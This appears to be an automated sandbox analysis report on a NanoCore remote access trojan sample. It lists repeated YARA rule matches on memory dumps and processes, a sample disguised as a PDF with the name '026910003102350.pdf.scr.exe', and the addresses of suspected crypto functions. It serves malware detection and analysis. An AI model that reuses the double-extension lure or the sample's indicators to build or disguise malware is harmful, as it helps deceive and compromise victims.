Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.585759853.0000000006040000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000003.00000002.585651630.0000000005E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 5960, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: 026910003102350.pdf.scr.exe

Detected potential crypto function

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CC848E	0_2_00CC848E
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD6CDC	0_2_00CD6CDC
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CC40FE	0_2_00CC40FE
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD4088	0_2_00CD4088
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD00B7	0_2_00CD00B7
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CE51C9	0_2_00CE51C9
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD7153	0_2_00CD7153
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD62CA	0_2_00CD62CA
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CC32F7	0_2_00CC32F7
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD43BF	0_2_00CD43BF
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CED440	0_2_00CED440
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CCF461	0_2_00CCF461
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CCC426	0_2_00CCC426
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD77EF	0_2_00CD77EF
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CED8EE	0_2_00CED8EE
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CC286B	0_2_00CC286B
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CF19F4	0_2_00CF19F4
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CCE9B7	0_2_00CCE9B7
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CD3E0B	0_2_00CD3E0B
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CCEFE2	0_2_00CCEFE2
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CE4F9A	0_2_00CE4F9A
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00338037	2_2_00338037
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00332007	2_2_00332007
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0032E0BE	2_2_0032E0BE
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0031E1A0	2_2_0031E1A0
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0031225D	2_2_0031225D
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0034A28E	2_2_0034A28E
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003322C2	2_2_003322C2
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0032C59E	2_2_0032C59E
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0039C7A3	2_2_0039C7A3
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0034E89F	2_2_0034E89F
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0038291A	2_2_0038291A
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00346AFB	2_2_00346AFB
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00378B27	2_2_00378B27
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0033CE30	2_2_0033CE30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00347169	2_2_00347169
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003A51D2	2_2_003A51D2
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00319240	2_2_00319240
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00319499	2_2_00319499
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00331724	2_2_00331724
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00331A96	2_2_00331A96
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00319B60	2_2_00319B60
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00337BAB	2_2_00337BAB
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00331D40	2_2_00331D40
